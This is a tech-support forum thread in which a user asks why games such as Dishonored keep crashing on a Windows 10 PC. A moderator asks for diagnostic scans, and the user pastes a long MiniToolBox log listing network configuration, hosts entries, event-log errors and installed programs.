Closed/Inactive My games are randomly crashing

  • Hi there and welcome to PC Help Forum (PCHF), a more effective way to get the Tech Support you need!
    We have Experts in all areas of Tech, including Malware Removal, Crash Fixing and BSOD's , Microsoft Windows, Computer DIY and PC Hardware, Networking, Gaming, Tablets and iPads, General and Specific Software Support and so much more.

    Why not Click Here To Sign Up and start enjoying great FREE Tech Support.

    This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.
Welcome to our Community
Wanting to join the rest of our members? Feel free to sign up today.
Sign up
Status
Not open for further replies.

Nathan Turnock

PCHF Member
PCHF Member
Dec 11, 2016
6
3
18
Hello,
I'm not very good with all the PC specs so not sure what I should give but I'm on windows 10, I have an I7 and GTX 960, 64-bit operating system. I recently bought Dishonoured and for some reason, it keeps crashing at random points during the game, this happens for me on Mount and Blade Warband,Hearts of Iron 4 and Rocket League. I have tried verifying the game cache on steam,un-installing and re-installing my drivers but I still have this problem.

Thanks.
 

Malnutrition

Malnurished Mod
Moderator
Security Team
Jul 22, 2016
3,395
551
Welcome to PCHF Lets get some info from your machine, to get things rolling.

Step 1: Speccy Scan.


  • Please go here and download Speccy.
  • Install and run the program.
  • Upon Completion:
  • Hit File
  • Publish Snap Shot
  • A link will appear, post that link.

Step 2: MiniToolBox Scan



Please download MINITOOLBOX and run it.

Checkmark following boxes:



Flush DNS
Reset FF proxy Settings
Reset Ie Proxy Settings
Report IE Proxy Settings
Report FF Proxy Settings
List content of Hosts
List IP configuration
List Winsock Entries
List last 10 Event Viewer log
List Installed Programs
List Users, Partitions and Memory size
List Devices (problems only)



Click Go post the result.

Step 3: Autoruns Scan.


Download Autoruns and Autorunsc Unzip it to your desktop and then double click autoruns.exe
After the scan is finished then click on File>>>>>>>>>>>Save
The default name will be autoruns.arn make sure to save it as Autoruns.txt under the file type option.
in other words make sure it is a .txt file instead of .arn Attach the text in your next reply.


Step 4: HijackThis.




1- Please click HERE to download HijackThis.
2- Run the program.
3- Click on the Main Menu button if not already there.
4- Select Do a system scan and save a logfile.
5- Copy paste the log here.
 

Nathan Turnock

PCHF Member
PCHF Member
Dec 11, 2016
6
3
18
http://speccy.piriform.com/results/7byAbsCnUXhfzkWa4Zy6syw

MiniToolBox by Farbar Version: 17-06-2016
Ran by Nathan (administrator) on 11-12-2016 at 15:35:04
Running from "C:\Users\Nathan\Downloads"
Microsoft Windows 10 Home (X64)
Model: All Series Manufacturer: ASUS
Boot Mode: Normal
***************************************************************************

========================= Flush DNS: ===================================

Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========================= IE Proxy Settings: ==============================

Proxy is not enabled.
No Proxy Server is set.

"Reset IE Proxy Settings": IE Proxy Settings were reset.

========================= FF Proxy Settings: ==============================


"Reset FF Proxy Settings": Firefox Proxy settings were reset.

========================= Hosts content: =================================
127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com
========================= IP Configuration: ================================

TAP-Windows Adapter V9 = Ethernet 2 (Connected)
Realtek PCIe GBE Family Controller = Ethernet (Connected)
LogMeIn Hamachi Virtual Ethernet Adapter = Hamachi (Connected)
Broadcom 802.11ac Network Adapter = WiFi (Media disconnected)


# ----------------------------------
# IPv4 Configuration
# ----------------------------------
pushd interface ipv4

reset
set global icmpredirects=enabled taskoffload=disabled
add route prefix=0.0.0.0/0 interface="Hamachi" nexthop=25.0.0.1 publish=Yes
set interface interface="Local Area Connection* 1" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Ethernet 2" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Ethernet" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="WiFi" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Local Area Connection* 2" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Hamachi" forwarding=enabled advertise=enabled metric=9000 nud=enabled ignoredefaultroutes=disabled
set subinterface interface= subinterface=ethernet_32771 mtu=1404
add address name="Ethernet 2" address=169.254.123.11 mask=255.255.0.0


popd
# End of IPv4 configuration



Windows IP Configuration

Host Name . . . . . . . . . . . . : DESKTOP-5GKAVDH
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : home

Ethernet adapter Hamachi:

Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : LogMeIn Hamachi Virtual Ethernet Adapter
Physical Address. . . . . . . . . : 7A-79-19-78-EC-D0
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IPv6 Address. . . . . . . . . . . : 2620:9b::1978:ecd0(Preferred)
Link-local IPv6 Address . . . . . : fe80::d147:a923:c328:d61b%12(Preferred)
IPv4 Address. . . . . . . . . . . : 25.120.236.208(Preferred)
Subnet Mask . . . . . . . . . . . : 255.0.0.0
Lease Obtained. . . . . . . . . . : 11 December 2016 12:45:07
Lease Expires . . . . . . . . . . : 11 December 2017 12:45:06
Default Gateway . . . . . . . . . : 2620:9b::1900:1
25.0.0.1
DHCP Server . . . . . . . . . . . : 25.0.0.1
DHCPv6 IAID . . . . . . . . . . . : 100815090
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-1D-83-60-28-14-DD-A9-55-CA-68
DNS Servers . . . . . . . . . . . : 38.132.106.139
194.187.251.67
NetBIOS over Tcpip. . . . . . . . : Enabled

Wireless LAN adapter WiFi:

Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Broadcom 802.11ac Network Adapter
Physical Address. . . . . . . . . : C4-E9-84-45-E3-F0
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes

Wireless LAN adapter Local Area Connection* 2:

Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft Wi-Fi Direct Virtual Adapter
Physical Address. . . . . . . . . : C6-E9-84-45-E3-F0
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes

Ethernet adapter Ethernet:

Connection-specific DNS Suffix . : home
Description . . . . . . . . . . . : Realtek PCIe GBE Family Controller
Physical Address. . . . . . . . . : 14-DD-A9-55-CA-68
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::f44c:6b22:e6b:6c5b%3(Preferred)
IPv4 Address. . . . . . . . . . . : 192.168.1.98(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Lease Obtained. . . . . . . . . . : 11 December 2016 12:45:13
Lease Expires . . . . . . . . . . : 12 December 2016 12:45:12
Default Gateway . . . . . . . . . : 192.168.1.254
DHCP Server . . . . . . . . . . . : 192.168.1.254
DHCPv6 IAID . . . . . . . . . . . : 118807977
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-1D-83-60-28-14-DD-A9-55-CA-68
DNS Servers . . . . . . . . . . . : 192.168.1.254
NetBIOS over Tcpip. . . . . . . . : Enabled

Ethernet adapter Ethernet 2:

Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : TAP-Windows Adapter V9
Physical Address. . . . . . . . . : 00-FF-67-E0-0C-FB
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::ac23:2b0e:42e:ade6%7(Preferred)
IPv4 Address. . . . . . . . . . . : 169.254.123.11(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . :
DHCPv6 IAID . . . . . . . . . . . : 67174247
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-1D-83-60-28-14-DD-A9-55-CA-68
DNS Servers . . . . . . . . . . . : 38.132.106.139
194.187.251.67
NetBIOS over Tcpip. . . . . . . . : Disabled
Server: newyork-ns01.cyberghostvpn.com
Address: 38.132.106.139

Name: google.com
Addresses: 213.120.234.114
213.120.234.150


Pinging google.com [216.58.208.174] with 32 bytes of data:
Reply from 216.58.208.174: bytes=32 time=12ms TTL=54
Reply from 216.58.208.174: bytes=32 time=13ms TTL=54

Ping statistics for 216.58.208.174:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 12ms, Maximum = 13ms, Average = 12ms
Server: newyork-ns01.cyberghostvpn.com
Address: 38.132.106.139

Name: yahoo.com
Addresses: 213.120.234.114
213.120.234.150


Pinging yahoo.com [98.138.253.109] with 32 bytes of data:
Reply from 98.138.253.109: bytes=32 time=201ms TTL=49
Reply from 98.138.253.109: bytes=32 time=214ms TTL=49

Ping statistics for 98.138.253.109:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 201ms, Maximum = 214ms, Average = 207ms

Pinging 127.0.0.1 with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128

Ping statistics for 127.0.0.1:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
===========================================================================
Interface List
12...7a 79 19 78 ec d0 ......LogMeIn Hamachi Virtual Ethernet Adapter
15...c4 e9 84 45 e3 f0 ......Broadcom 802.11ac Network Adapter
4...c6 e9 84 45 e3 f0 ......Microsoft Wi-Fi Direct Virtual Adapter
3...14 dd a9 55 ca 68 ......Realtek PCIe GBE Family Controller
7...00 ff 67 e0 0c fb ......TAP-Windows Adapter V9
1...........................Software Loopback Interface 1
===========================================================================

IPv4 Route Table
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 25.0.0.1 25.120.236.208 9256
0.0.0.0 0.0.0.0 192.168.1.254 192.168.1.98 35
25.0.0.0 255.0.0.0 On-link 25.120.236.208 9256
25.120.236.208 255.255.255.255 On-link 25.120.236.208 9256
25.255.255.255 255.255.255.255 On-link 25.120.236.208 9256
127.0.0.0 255.0.0.0 On-link 127.0.0.1 331
127.0.0.1 255.255.255.255 On-link 127.0.0.1 331
127.255.255.255 255.255.255.255 On-link 127.0.0.1 331
169.254.0.0 255.255.0.0 On-link 169.254.123.11 311
169.254.123.11 255.255.255.255 On-link 169.254.123.11 311
169.254.255.255 255.255.255.255 On-link 169.254.123.11 311
192.168.1.0 255.255.255.0 On-link 192.168.1.98 291
192.168.1.98 255.255.255.255 On-link 192.168.1.98 291
192.168.1.255 255.255.255.255 On-link 192.168.1.98 291
224.0.0.0 240.0.0.0 On-link 127.0.0.1 331
224.0.0.0 240.0.0.0 On-link 192.168.1.98 291
224.0.0.0 240.0.0.0 On-link 25.120.236.208 9256
224.0.0.0 240.0.0.0 On-link 169.254.123.11 311
255.255.255.255 255.255.255.255 On-link 127.0.0.1 331
255.255.255.255 255.255.255.255 On-link 192.168.1.98 291
255.255.255.255 255.255.255.255 On-link 25.120.236.208 9256
255.255.255.255 255.255.255.255 On-link 169.254.123.11 311
===========================================================================
Persistent Routes:
Network Address Netmask Gateway Address Metric
0.0.0.0 0.0.0.0 25.0.0.1 Default
===========================================================================

IPv6 Route Table
===========================================================================
Active Routes:
If Metric Network Destination Gateway
12 9015 ::/0 2620:9b::1900:1
1 331 ::1/128 On-link
12 271 2620:9b::/64 On-link
12 271 2620:9b::/96 On-link
12 271 2620:9b::1978:ecd0/128 On-link
3 291 fe80::/64 On-link
12 271 fe80::/64 On-link
7 311 fe80::/64 On-link
7 311 fe80::ac23:2b0e:42e:ade6/128
On-link
12 271 fe80::d147:a923:c328:d61b/128
On-link
3 291 fe80::f44c:6b22:e6b:6c5b/128
On-link
1 331 ff00::/8 On-link
3 291 ff00::/8 On-link
12 271 ff00::/8 On-link
7 311 ff00::/8 On-link
===========================================================================
Persistent Routes:
If Metric Network Destination Gateway
0 4294967295 2620:9b::/96 On-link
0 9000 ::/0 2620:9b::1900:1
===========================================================================
========================= Winsock entries =====================================

Catalog5 01 C:\WINDOWS\SysWoW64\napinsp.dll [55808] (Microsoft Corporation)
Catalog5 02 C:\WINDOWS\SysWoW64\pnrpnsp.dll [70656] (Microsoft Corporation)
Catalog5 03 C:\WINDOWS\SysWoW64\pnrpnsp.dll [70656] (Microsoft Corporation)
Catalog5 04 C:\WINDOWS\SysWoW64\NLAapi.dll [65024] (Microsoft Corporation)
Catalog5 05 C:\WINDOWS\SysWoW64\mswsock.dll [306016] (Microsoft Corporation)
Catalog5 06 C:\WINDOWS\SysWoW64\winrnr.dll [24064] (Microsoft Corporation)
Catalog9 01 C:\WINDOWS\SysWoW64\mswsock.dll [306016] (Microsoft Corporation)
Catalog9 02 C:\WINDOWS\SysWoW64\mswsock.dll [306016] (Microsoft Corporation)
Catalog9 03 C:\WINDOWS\SysWoW64\mswsock.dll [306016] (Microsoft Corporation)
Catalog9 04 C:\WINDOWS\SysWoW64\mswsock.dll [306016] (Microsoft Corporation)
Catalog9 05 C:\WINDOWS\SysWoW64\mswsock.dll [306016] (Microsoft Corporation)
Catalog9 06 C:\WINDOWS\SysWoW64\mswsock.dll [306016] (Microsoft Corporation)
Catalog9 07 C:\WINDOWS\SysWoW64\mswsock.dll [306016] (Microsoft Corporation)
Catalog9 08 C:\WINDOWS\SysWoW64\mswsock.dll [306016] (Microsoft Corporation)
Catalog9 09 C:\WINDOWS\SysWoW64\mswsock.dll [306016] (Microsoft Corporation)
Catalog9 10 C:\WINDOWS\SysWoW64\mswsock.dll [306016] (Microsoft Corporation)
Catalog9 11 C:\WINDOWS\SysWoW64\mswsock.dll [306016] (Microsoft Corporation)
Catalog9 12 C:\WINDOWS\SysWoW64\mswsock.dll [306016] (Microsoft Corporation)
x64-Catalog5 01 C:\Windows\System32\napinsp.dll [67584] (Microsoft Corporation)
x64-Catalog5 02 C:\Windows\System32\pnrpnsp.dll [86016] (Microsoft Corporation)
x64-Catalog5 03 C:\Windows\System32\pnrpnsp.dll [86016] (Microsoft Corporation)
x64-Catalog5 04 C:\Windows\System32\NLAapi.dll [80896] (Microsoft Corporation)
x64-Catalog5 05 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog5 06 C:\Windows\System32\winrnr.dll [31744] (Microsoft Corporation)
x64-Catalog9 01 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 02 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 03 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 04 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 05 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 06 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 07 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 08 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 09 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 10 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 11 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 12 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)

========================= Event log errors: ===============================

Application errors:
==================
Error: (12/11/2016 03:30:29 PM) (Source: Microsoft-Windows-Immersive-Shell) (User: DESKTOP-5GKAVDH)
Description: Activation of application Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe!Microsoft.MicrosoftOfficeHub failed with error: -2144927149 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (12/11/2016 03:30:29 PM) (Source: Microsoft-Windows-Immersive-Shell) (User: DESKTOP-5GKAVDH)
Description: Activation of application Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927149 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (12/11/2016 03:30:29 PM) (Source: Microsoft-Windows-Immersive-Shell) (User: DESKTOP-5GKAVDH)
Description: Activation of application Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927149 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (12/11/2016 03:30:29 PM) (Source: Microsoft-Windows-Immersive-Shell) (User: DESKTOP-5GKAVDH)
Description: Activation of application Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927149 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (12/11/2016 03:30:29 PM) (Source: Microsoft-Windows-Immersive-Shell) (User: DESKTOP-5GKAVDH)
Description: Activation of application microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2144927149 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (12/11/2016 03:15:29 PM) (Source: Microsoft-Windows-Immersive-Shell) (User: DESKTOP-5GKAVDH)
Description: Activation of application Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe!Microsoft.MicrosoftOfficeHub failed with error: -2144927149 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (12/11/2016 03:00:29 PM) (Source: Microsoft-Windows-Immersive-Shell) (User: DESKTOP-5GKAVDH)
Description: Activation of application Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe!Microsoft.MicrosoftOfficeHub failed with error: -2144927149 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (12/11/2016 02:57:29 PM) (Source: Microsoft-Windows-Immersive-Shell) (User: DESKTOP-5GKAVDH)
Description: Activation of application Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927149 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (12/11/2016 02:57:29 PM) (Source: Microsoft-Windows-Immersive-Shell) (User: DESKTOP-5GKAVDH)
Description: Activation of application Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927149 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (12/11/2016 02:45:29 PM) (Source: Microsoft-Windows-Immersive-Shell) (User: DESKTOP-5GKAVDH)
Description: Activation of application Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe!Microsoft.MicrosoftOfficeHub failed with error: -2144927149 See the Microsoft-Windows-TWinUI/Operational log for additional information.


System errors:
=============
Error: (12/11/2016 12:48:13 PM) (Source: DCOM) (User: NT AUTHORITY)
Description: application-specificLocalActivation{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}{F72671A9-012C-4725-9D2F-2A4D32D65169}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (12/09/2016 09:56:15 PM) (Source: DCOM) (User: NT AUTHORITY)
Description: application-specificLocalActivation{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}{F72671A9-012C-4725-9D2F-2A4D32D65169}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (12/09/2016 09:25:46 PM) (Source: Service Control Manager) (User: )
Description: The luafv service failed to start due to the following error:
%%1275 = This driver has been blocked from loading


Error: (12/09/2016 03:59:47 PM) (Source: DCOM) (User: NT AUTHORITY)
Description: application-specificLocalActivation{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}{F72671A9-012C-4725-9D2F-2A4D32D65169}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (12/09/2016 03:43:58 PM) (Source: Service Control Manager) (User: )
Description: The luafv service failed to start due to the following error:
%%1275 = This driver has been blocked from loading


Error: (12/09/2016 03:43:58 PM) (Source: EventLog) (User: )
Description: The previous system shutdown at 22:42:45 on ‎08/‎12/‎2016 was unexpected.

Error: (12/09/2016 03:43:53 PM) (Source: Microsoft-Windows-Kernel-Boot) (User: NT AUTHORITY)
Description: 32212256841071248

Error: (12/08/2016 10:42:45 PM) (Source: Service Control Manager) (User: )
Description: The luafv service failed to start due to the following error:
%%1275 = This driver has been blocked from loading


Error: (12/08/2016 07:50:33 PM) (Source: DCOM) (User: NT AUTHORITY)
Description: application-specificLocalActivation{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}{F72671A9-012C-4725-9D2F-2A4D32D65169}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (12/08/2016 07:46:49 PM) (Source: Service Control Manager) (User: )
Description: The luafv service failed to start due to the following error:
%%1275 = This driver has been blocked from loading



Microsoft Office Sessions:
=========================
Error: (12/11/2016 03:30:29 PM) (Source: Microsoft-Windows-Immersive-Shell)(User: DESKTOP-5GKAVDH)
Description: Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe!Microsoft.MicrosoftOfficeHub-2144927149

Error: (12/11/2016 03:30:29 PM) (Source: Microsoft-Windows-Immersive-Shell)(User: DESKTOP-5GKAVDH)
Description: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI-2144927149

Error: (12/11/2016 03:30:29 PM) (Source: Microsoft-Windows-Immersive-Shell)(User: DESKTOP-5GKAVDH)
Description: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI-2144927149

Error: (12/11/2016 03:30:29 PM) (Source: Microsoft-Windows-Immersive-Shell)(User: DESKTOP-5GKAVDH)
Description: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI-2144927149

Error: (12/11/2016 03:30:29 PM) (Source: Microsoft-Windows-Immersive-Shell)(User: DESKTOP-5GKAVDH)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1-2144927149

Error: (12/11/2016 03:15:29 PM) (Source: Microsoft-Windows-Immersive-Shell)(User: DESKTOP-5GKAVDH)
Description: Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe!Microsoft.MicrosoftOfficeHub-2144927149

Error: (12/11/2016 03:00:29 PM) (Source: Microsoft-Windows-Immersive-Shell)(User: DESKTOP-5GKAVDH)
Description: Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe!Microsoft.MicrosoftOfficeHub-2144927149

Error: (12/11/2016 02:57:29 PM) (Source: Microsoft-Windows-Immersive-Shell)(User: DESKTOP-5GKAVDH)
Description: Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App-2144927149

Error: (12/11/2016 02:57:29 PM) (Source: Microsoft-Windows-Immersive-Shell)(User: DESKTOP-5GKAVDH)
Description: Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App-2144927149

Error: (12/11/2016 02:45:29 PM) (Source: Microsoft-Windows-Immersive-Shell)(User: DESKTOP-5GKAVDH)
Description: Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe!Microsoft.MicrosoftOfficeHub-2144927149


=========================== Installed Programs ============================

Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.1.335 - Adobe Systems Incorporated)
Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.162 - Adobe Systems Incorporated)
Adobe Media Encoder CC 2015 (HKLM-x32\...\{0FAC7130-BEC5-47A5-8813-1D339B8326ED}) (Version: 9.0.2 - Adobe Systems Incorporated)
Adobe Photoshop CS2 (HKLM-x32\...\Adobe Photoshop CS2 - {236BB7C4-4419-42FD-0409-1E257A25E34D}) (Version: 9.0 - Adobe Systems, Inc.)
Adobe Premiere Pro CC 2015 (HKLM-x32\...\{38C72D42-0672-43B1-9E05-E7631684F9A1}) (Version: 9.0.2 - Adobe Systems Incorporated)
Advanced SystemCare 9 (HKLM-x32\...\Advanced SystemCare_is1) (Version: 9.4.0 - IObit)
ALPR+ (HKLM\...\{17D2776A-C637-4D8F-9C33-B7185BFC80D0}) (Version: 1.0.0.0 - Stealth22)
Ansel (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Ansel) (Version: 375.95 - NVIDIA Corporation) Hidden
Arma 3 (HKLM-x32\...\Steam App 107410) (Version: - Bohemia Interactive)
Audacity 2.1.1 (HKLM-x32\...\Audacity®_is1) (Version: 2.1.1 - Audacity Team)
AVG 2016 (HKLM\...\{2272D5BF-6158-4042-9E55-5D0E0793D32E}) (Version: 16.0.4489 - AVG Technologies) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Controller Companion (HKLM\...\Steam App 367670) (Version: - Koga Tech Limited)
Corsair Utility Engine (HKLM-x32\...\{46A3EEB3-8F6F-4BC4-9A53-CDE33D089D08}) (Version: 1.16.42 - Corsair)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version: - Valve)
CyberGhost 5 (HKLM\...\CyberGhost 5_is1) (Version: - CyberGhost S.R.L.)
CyberLink PowerDVD 15 (HKLM-x32\...\{DE85B8F3-D088-4D6E-A970-EE0BC7883A66}) (Version: 15.0.1510.58 - CyberLink Corp.)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
DarthMod Empire (HKLM-x32\...\DarthMod Empire8.0 Platinum) (Version: 8.0 Platinum - )
DarthMod Empire (HKLM-x32\...\DarthMod Empire8.0.1 Platinum) (Version: 8.0.1 Platinum - )
Dead Rising 3 (HKLM-x32\...\Steam App 265550) (Version: - Capcom Game Studio Vancouver)
Discord (HKCU\...\Discord) (Version: 0.0.296 - Hammer & Chisel, Inc.)
Dishonored (HKLM\...\Steam App 205100) (Version: - Arkane Studios)
Driver Booster 3.5 (HKLM-x32\...\Driver Booster_is1) (Version: 3.5 - IObit)
Driver Talent (HKLM-x32\...\{29FE44D7-BC89-4188-8B0E-F6BA073C15A5}_is1) (Version: 6.4.47.146 - OSToto Co., Ltd.)
DriverUpdate (HKLM-x32\...\{75881A1F-A02E-4D88-BCFA-34D86752A0C3}) (Version: 2.6.4 - Slimware Utilities Holdings, Inc.) Hidden
DriverUpdate (HKLM-x32\...\DriverUpdate) (Version: 2.6.4 - Slimware Utilities Holdings, Inc.)
Elgato Game Capture HD (HKLM\...\{4281A206-158E-4C28-B078-397188759F60}) (Version: 3.20.33.1533 - Elgato Systems GmbH)
Empire Total War Minor Factions Revenge (HKLM-x32\...\Empire Total War Minor Factions Revenge) (Version: v31.01.2014 - Modding by Itan)
FaceCam 311 (HKLM-x32\...\{6A7E688F-A6CC-49B1-8F24-25634B56F1E1}) (Version: 1.0.1.8 - KYE)
Fallout 4 (HKLM-x32\...\Steam App 377160) (Version: - Bethesda Game Studios)
FMW 1 (HKLM\...\{BCA7CC8C-745B-4340-B3A8-BC79A8498107}) (Version: 1.32.2 - AVG Technologies) Hidden
FontForge version 27-08-2015 (HKLM-x32\...\{56748B9C-19AE-4689-B8C5-5A45AE0A993A}_is1) (Version: 27-08-2015 - FontForgeBuilds)
Football Manager 2016 (HKLM-x32\...\Steam App 378120) (Version: - SEGA)
Football Manager 2016 Editor (HKLM\...\Steam App 378200) (Version: - )
Football Manager 2017 (HKLM\...\Steam App 482730) (Version: - Sports Interactive)
Football Tactics (HKLM\...\Steam App 375530) (Version: - Creoteam)
Fraps (remove only) (HKLM-x32\...\Fraps) (Version: - )
Free2X Webcam Recorder 1.0.0.1 (HKLM-x32\...\Free2X Webcam Recorder_is1) (Version: - )
Game Capture HD v2.3.3.40 (HKLM-x32\...\Software_Elgato_Game Capture HD) (Version: 2.3.3.40 - Elgato Systems)
Game Capture HD60 Pro v1.1.0.149 (HKLM-x32\...\Software_Elgato_Game Capture HD60 Pro) (Version: 1.1.0.149 - Elgato Systems)
Game Capture HD60 S v1.1.0.160 (HKLM-x32\...\Software_Elgato_Game Capture HD60 S) (Version: 1.1.0.160 - Elgato Systems)
Game Capture HD60 v2.1.1.4 (HKLM-x32\...\Software_Elgato_Game Capture HD60) (Version: 2.1.1.4 - Elgato Systems)
Game Dev Tycoon (HKLM\...\Steam App 239820) (Version: - Greenheart Games)
GameSpy Arcade (HKLM-x32\...\GameSpy Arcade) (Version: - )
Garry's Mod (HKLM-x32\...\Steam App 4000) (Version: - Facepunch Studios)
GIMP 2.8.16 (HKLM\...\GIMP-2_is1) (Version: 2.8.16 - The GIMP Team)
GOG Galaxy (HKLM-x32\...\{7258BA11-600C-430E-A759-27E2C691A335}_is1) (Version: - GOG.com)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 54.0.2840.99 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{18455581-E099-4BA8-BC6B-F34B2F06600C}) (Version: 1.0.0 - Google Inc.) Hidden
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.8231.2252 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.31.5 - Google Inc.) Hidden
Grand Theft Auto III (HKLM-x32\...\Steam App 12100) (Version: - Rockstar Games)
Grand Theft Auto V (HKLM-x32\...\{E01FA564-2094-4833-8F2F-1FFEC6AFCC46}) (Version: "1.00.0000" - Rockstar Games)
Hearts of Iron IV (HKLM\...\Steam App 394360) (Version: - Paradox Development Studios)
ICBM version 1.4 (HKLM-x32\...\{1C682CD6-B923-4AE2-8F64-F28063CE94A0}_is1) (Version: 1.4 - REPVBLIC)
Intel(R) Chipset Device Software (HKLM-x32\...\{4a87bd28-a855-4a8d-b133-60ca8ccffd30}) (Version: 10.0.17 - Intel(R) Corporation) Hidden
